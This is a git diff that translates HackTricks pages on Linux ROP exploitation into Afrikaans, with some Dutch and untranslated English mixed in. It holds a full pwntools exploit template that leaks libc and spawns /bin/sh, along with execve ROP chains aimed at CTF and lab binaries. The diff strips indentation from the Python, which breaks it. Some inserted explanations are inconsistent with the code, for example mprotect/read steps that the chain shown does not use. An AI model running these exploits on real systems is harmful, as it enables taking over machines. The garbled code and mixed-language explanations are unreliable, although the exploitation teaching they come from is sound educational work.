the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. +Jy kan ook [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget) gebruik om 'n skulp te verkry in plaas van **sisteem** en **"/bin/sh"** te gebruik. **ONE\_GADGET** sal binne die libc-biblioteek 'n manier vind om 'n skulp te verkry deur net een **ROP-adres** te gebruik.\ +Gewoonlik is daar egter beperkings, die mees algemene en maklikste om te vermy is soos `[rsp+0x30] == NULL`. Aangesien jy die waardes binne die **RSP** beheer, hoef jy net nog 'n paar NULL-waardes te stuur sodat die beperking vermy word. ![](<../../../.gitbook/assets/image (615).png>) - ```python ONE_GADGET = libc.address + 0x4526a rop2 = base + p64(ONE_GADGET) + "\x00"*100 ``` +# HACKERINGSLEËR -# EXPLOIT FILE - -You can find a template to exploit this vulnerability here: +Jy kan 'n sjabloon vind om hierdie kwesbaarheid uit te buit hier: {% content-ref url="rop-leaking-libc-template.md" %} [rop-leaking-libc-template.md](rop-leaking-libc-template.md) {% endcontent-ref %} -# Common problems +# Algemene probleme -## MAIN\_PLT = elf.symbols\['main'] not found - -If the "main" symbol does not exist. Then you can just where is the main code: +## MAIN\_PLT = elf.symbols\['main'] nie gevind nie +As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: 0000000000401080 <.text>: ``` - -and set the address manually: - +en stel die adres handmatig in: ```python MAIN_PLT = 0x401080 ``` +## Puts nie gevind nie -## Puts not found +As die binêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van -If the binary is not using Puts you should check if it is using +## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` -## `sh: 1: %s%s%s%s%s%s%s%s: not found` - -If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` - -Try to **subtract 64 bytes to the address of "/bin/sh"**: +As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` +Probeer om **64 byte van die adres van "/bin/sh" af te trek**: ```python BINSH = next(libc.search("/bin/sh")) - 64 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md index d759fbff5..ab52d0532 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -1,16 +1,14 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
@@ -35,25 +33,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it ENV = {"LD_PRELOAD": LIBC} if LIBC else {} if LOCAL: - P = process(LOCAL_BIN, env=ENV) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +P = process(LOCAL_BIN, env=ENV) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTETTCP: - P = remote('10.10.10.10',1339) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +P = remote('10.10.10.10',1339) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - p = ssh_shell.process(REMOTE_BIN) # start the vuln binary - elf = ELF(LOCAL_BIN)# Extract data from binary - rop = ROP(elf)# Find ROP gadgets +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +p = ssh_shell.process(REMOTE_BIN) # start the vuln binary +elf = ELF(LOCAL_BIN)# Extract data from binary +rop = ROP(elf)# Find ROP gadgets if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") @@ -63,15 +61,15 @@ if GDB and not REMOTETTCP and not REMOTESSH: OFFSET = b"" #b"A"*264 if OFFSET == b"": - gdb.attach(P.pid, "c") #Attach and continue - payload = cyclic(264) - payload += b"AAAAAAAA" - print(P.clean()) - P.sendline(payload) - #x/wx $rsp -- Search for bytes that crashed the application - #print(cyclic_find(0x63616171)) # Find the offset of those bytes - P.interactive() - exit() +gdb.attach(P.pid, "c") #Attach and continue +payload = cyclic(264) +payload += b"AAAAAAAA" +print(P.clean()) +P.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#print(cyclic_find(0x63616171)) # Find the offset of those bytes +P.interactive() +exit() @@ -79,11 +77,11 @@ if OFFSET == b"": ### Find Gadgets ### #################### try: - libc_func = "puts" - PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts +libc_func = "puts" +PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts except: - libc_func = "printf" - PUTS_PLT = ELF_LOADED.plt['printf'] +libc_func = "printf" +PUTS_PLT = ELF_LOADED.plt['printf'] MAIN_PLT = ELF_LOADED.symbols['main'] POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" @@ -100,54 +98,54 @@ log.info("ret gadget: " + hex(RET)) ######################## def generate_payload_aligned(rop): - payload1 = OFFSET + rop - if (len(payload1) % 16) == 0: - return payload1 - - else: - payload2 = OFFSET + p64(RET) + rop - if (len(payload2) % 16) == 0: - log.info("Payload aligned successfully") - return payload2 - else: - log.warning(f"I couldn't align the payload! Len: {len(payload1)}") - return payload1 +payload1 = OFFSET + rop +if (len(payload1) % 16) == 0: +return payload1 + +else: +payload2 = OFFSET + p64(RET) + rop +if (len(payload2) % 16) == 0: +log.info("Payload aligned successfully") +return payload2 +else: +log.warning(f"I couldn't align the payload! Len: {len(payload1)}") +return payload1 def get_addr(libc_func): - FUNC_GOT = ELF_LOADED.got[libc_func] - log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) - # Create rop chain - rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) - rop1 = generate_payload_aligned(rop1) +FUNC_GOT = ELF_LOADED.got[libc_func] +log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +rop1 = generate_payload_aligned(rop1) - # Send our rop-chain payload - #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received - print(P.clean()) # clean socket buffer (read all and print) - P.sendline(rop1) +# Send our rop-chain payload +#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received +print(P.clean()) # clean socket buffer (read all and print) +P.sendline(rop1) - # If binary is echoing back the payload, remove that message - recieved = P.recvline().strip() - if OFFSET[:30] in recieved: - recieved = P.recvline().strip() - - # Parse leaked address - log.info(f"Len rop1: {len(rop1)}") - leak = u64(recieved.ljust(8, b"\x00")) - log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") - - # Set lib base address - if LIBC: - LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base - print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") - log.info("LIBC base @ %s" % hex(LIBC.address)) +# If binary is echoing back the payload, remove that message +recieved = P.recvline().strip() +if OFFSET[:30] in recieved: +recieved = P.recvline().strip() - # If not LIBC yet, stop here - else: - print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") - P.interactive() - - return hex(leak) +# Parse leaked address +log.info(f"Len rop1: {len(rop1)}") +leak = u64(recieved.ljust(8, b"\x00")) +log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") + +# Set lib base address +if LIBC: +LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base +print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") +log.info("LIBC base @ %s" % hex(LIBC.address)) + +# If not LIBC yet, stop here +else: +print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") +P.interactive() + +return hex(leak) get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base @@ -160,39 +158,39 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base ## Via One_gadget (https://github.com/david942j/one_gadget) # gem install one_gadget def get_one_gadgets(libc): - import string, subprocess - args = ["one_gadget", "-r"] - if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): - args += ["-b", libc.hex()] - else: - args += [libc] - try: - one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] - except: - print("One_gadget isn't installed") - one_gadgets = [] - return +import string, subprocess +args = ["one_gadget", "-r"] +if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): +args += ["-b", libc.hex()] +else: +args += [libc] +try: +one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] +except: +print("One_gadget isn't installed") +one_gadgets = [] +return rop2 = b"" if USE_ONE_GADGET: - one_gadgets = get_one_gadgets(LIBC) - if one_gadgets: - rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains +one_gadgets = get_one_gadgets(LIBC) +if one_gadgets: +rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains ## Normal/Long exploitation if not rop2: - BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh - SYSTEM = LIBC.sym["system"] - EXIT = LIBC.sym["exit"] - - log.info("POP_RDI %s " % hex(POP_RDI)) - log.info("bin/sh %s " % hex(BINSH)) - log.info("system %s " % hex(SYSTEM)) - log.info("exit %s " % hex(EXIT)) - - rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) - rop2 = generate_payload_aligned(rop2) - +BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh +SYSTEM = LIBC.sym["system"] +EXIT = LIBC.sym["exit"] + +log.info("POP_RDI %s " % hex(POP_RDI)) +log.info("bin/sh %s " % hex(BINSH)) +log.info("system %s " % hex(SYSTEM)) +log.info("exit %s " % hex(EXIT)) + +rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) +rop2 = generate_payload_aligned(rop2) + print(P.clean()) P.sendline(rop2) @@ -201,51 +199,42 @@ P.interactive() #Interact with your shell :) ``` {% endcode %} -# Common problems +# Algemene probleme -## MAIN\_PLT = elf.symbols\['main'] not found - -If the "main" symbol does not exist. Then you can just where is the main code: +## MAIN\_PLT = elf.symbols\['main'] nie gevind nie +As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: 0000000000401080 <.text>: ``` - -and set the address manually: - +en stel die adres handmatig in: ```python MAIN_PLT = 0x401080 ``` +## Puts nie gevind nie -## Puts not found +As die binaêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van -If the binary is not using Puts you should check if it is using +## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` -## `sh: 1: %s%s%s%s%s%s%s%s: not found` - -If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` - -Try to **subtract 64 bytes to the address of "/bin/sh"**: +As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` +Probeer om **64 byte van die adres van "/bin/sh" af te trek**: ```python BINSH = next(libc.search("/bin/sh")) - 64 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md index afef61443..e743c87ab 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md +++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md @@ -1,32 +1,31 @@ -# ROP - call sys\_execve +# ROP - roep sys_execve aan
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-In order to prepare the call for the **syscall** it's needed the following configuration: +Om de oproep voor de **syscall** voor te bereiden, is de volgende configuratie nodig: -* `rax: 59 Specify sys_execve` -* `rdi: ptr to "/bin/sh" specify file to execute` -* `rsi: 0 specify no arguments passed` -* `rdx: 0 specify no environment variables passed` +* `rax: 59 Specificeer sys_execve` +* `rdi: ptr naar "/bin/sh" specificeer het uit te voeren bestand` +* `rsi: 0 specificeer dat er geen argumenten worden doorgegeven` +* `rdx: 0 specificeer dat er geen omgevingsvariabelen worden doorgegeven` -So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). +Dus, in feite is het nodig om de string `/bin/sh` ergens te schrijven en vervolgens de `syscall` uit te voeren (met inachtneming van de padding die nodig is om de stack te controleren). -## Control the registers - -Let's start by finding **how to control those registers**: +## Beheer de registers +Laten we beginnen met het vinden van **hoe we die registers kunnen beheersen**: ```c ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x0000000000415664 : pop rax ; ret @@ -34,15 +33,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x00000000004101f3 : pop rsi ; ret 0x00000000004498b5 : pop rdx ; ret ``` +Met hierdie adresse is dit moontlik om die inhoud in die stoor te skryf en dit in die registre te laai. -With these addresses it's possible to **write the content in the stack and load it into the registers**. +## Skryf string -## Write string - -### Writable memory - -Frist you need to find a writable place in the memory +### Skryfbare geheue +Eerstens moet jy 'n skryfbare plek in die geheue vind. ```bash gef> vmmap [ Legend: Code | Heap | Stack ] @@ -51,18 +48,44 @@ Start End Offset Perm Path 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap] ``` +### Skryf String -### Write String - -Then you need to find a way to write arbitrary content in this address - +Dan moet jy 'n manier vind om willekeurige inhoud op hierdie adres te skryf ```python ROPgadget --binary speedrun-001 | grep " : mov qword ptr \[" mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx ``` +#### 32-bits -#### 32 bits +##### ROP (Return Oriented Programming) +ROP is a technique used in exploitation to bypass security measures like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). It involves chaining together small pieces of code, known as gadgets, to perform malicious actions. + +##### Syscall + +A syscall is a way for a program to request services from the operating system. In Linux, syscalls are identified by a number, and the parameters for the syscall are passed in registers. + +##### Execv + +The execv syscall is used to execute a program in Linux. It takes two arguments: the path to the program and an array of strings representing the program's arguments. + +##### ROP + Syscall + Execv + +To execute a program using ROP, we need to find gadgets that perform the necessary syscalls and set the appropriate registers. We can then chain these gadgets together to create a ROP chain that calls execv with the desired program and arguments. + +##### Example + +Here is an example of a ROP chain that calls execv to execute the "/bin/sh" program: + +1. Find gadgets that set the registers for the execv syscall. +2. Find a gadget that sets the EAX register to the syscall number for execv. +3. Find a gadget that sets the EBX register to the address of the "/bin/sh" string. +4. Find a gadget that sets the ECX register to the address of the argument array. +5. Find a gadget that sets the EDX register to 0 (no environment variables). +6. Find a gadget that performs the syscall instruction. +7. Chain these gadgets together in the correct order, setting the registers and performing the syscall. + +By carefully constructing the ROP chain, we can execute arbitrary programs with arbitrary arguments, giving us full control over the system. ```python ''' Lets write "/bin/sh" to 0x6b6000 @@ -84,9 +107,42 @@ rop += popRax rop += p32(0x6b6000 + 4) rop += writeGadget ``` +#### 64-bits -#### 64 bits +##### ROP + Syscall + execv +Hierdie tegniek maak gebruik van Return-Oriented Programming (ROP) in kombinasie met die Syscall-instruksie en die execv-sisteemoproep om 'n uitvoerbare lêer uit te voer op 'n 64-bits Linux-stelsel. + +##### Stap 1: Identifiseer die funksies + +Eerstens moet ons die funksies identifiseer wat ons sal gebruik in ons ROP-ketting. Ons het die volgende funksies nodig: + +- `mprotect`: Hierdie funksie sal ons toelaat om die uitvoerbare geheuegebied te verander na lees-, skryf- en uitvoerbare (rwx) toestand. +- `read`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer in die geheue te lees. +- `execve`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer uit te voer. + +##### Stap 2: Bou die ROP-ketting + +Ons sal die volgende stappe volg om die ROP-ketting te bou: + +1. Kry die adres van die `mprotect`-funksie in die geheue. +2. Kry die adres van die `read`-funksie in die geheue. +3. Kry die adres van die `execve`-funksie in die geheue. +4. Kry die adres van die uitvoerbare lêer in die geheue. +5. Bou die ROP-ketting deur die funksie-adresse en die nodige argumente in die regte volgorde te stapel. + +##### Stap 3: Voer die ROP-ketting uit + +Nadat die ROP-ketting gebou is, kan ons dit uitvoer deur die Syscall-instruksie te gebruik. Hier is die stappe wat ons moet volg: + +1. Stel die regsiters korrek in vir die Syscall-instruksie. +2. Voer die Syscall-instruksie uit. + +##### Stap 4: Verifieer die uitvoering + +Om te verseker dat die uitvoering suksesvol was, kan ons die uitvoer van die uitvoerbare lêer monitor. + +Met hierdie tegniek kan ons 'n uitvoerbare lêer uitvoer op 'n 64-bits Linux-stelsel deur gebruik te maak van ROP, die Syscall-instruksie en die execv-sisteemoproep. ```python ''' Lets write "/bin/sh" to 0x6b6000 @@ -102,9 +158,35 @@ rop += popRax rop += p64(0x6b6000) # Writable memory rop += writeGadget #Address to: mov qword ptr [rax], rdx ``` +## Voorbeeld -## Example +In this example, we will use a basic ROP (Return-Oriented Programming) technique to execute the `execv` system call in a Linux environment. +In hierdie voorbeeld sal ons 'n basiese ROP (Return-Oriented Programming) tegniek gebruik om die `execv` stelseloproep in 'n Linux omgewing uit te voer. + +First, we need to find the addresses of the gadgets we will use in our ROP chain. We can use tools like `ROPgadget` or `ropper` to search for gadgets in the binary. + +Eerstens moet ons die adresse van die gadgets wat ons in ons ROP-ketting sal gebruik, vind. Ons kan gereedskap soos `ROPgadget` of `ropper` gebruik om gadgets in die binêre lêer te soek. + +Once we have the addresses, we can start building our ROP chain. The ROP chain will consist of the addresses of the gadgets we want to use, followed by the arguments for the `execv` system call. + +Sodra ons die adresse het, kan ons begin om ons ROP-ketting te bou. Die ROP-ketting sal bestaan uit die adresse van die gadgets wat ons wil gebruik, gevolg deur die argumente vir die `execv` stelseloproep. + +We will need gadgets that perform the following actions: +1. Load the address of the `/bin/sh` string into a register. +2. Load the address of the `execv` function into a register. +3. Load the arguments for the `execv` function into registers. +4. Call the `execv` function. + +Ons sal gadgets benodig wat die volgende aksies uitvoer: +1. Laai die adres van die `/bin/sh` string in 'n register. +2. Laai die adres van die `execv` funksie in 'n register. +3. Laai die argumente vir die `execv` funksie in registers. +4. Roep die `execv` funksie aan. + +Once we have our ROP chain, we can trigger the vulnerability to execute our ROP chain and ultimately the `execv` system call. + +Sodra ons ons ROP-ketting het, kan ons die kwesbaarheid aktiveer om ons ROP-ketting en uiteindelik die `execv` stelseloproep uit te voer. ```python from pwn import * @@ -169,23 +251,22 @@ payload = "0"*0x408 + rop # Send the payload, drop to an interactive shell to use our new shell target.sendline(payload) -target.interactive() +target.interactive() ``` - -## References +## Verwysings * [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md index 24531da75..d9f59573e 100644 --- a/exploiting/tools/README.md +++ b/exploiting/tools/README.md @@ -1,22 +1,19 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat 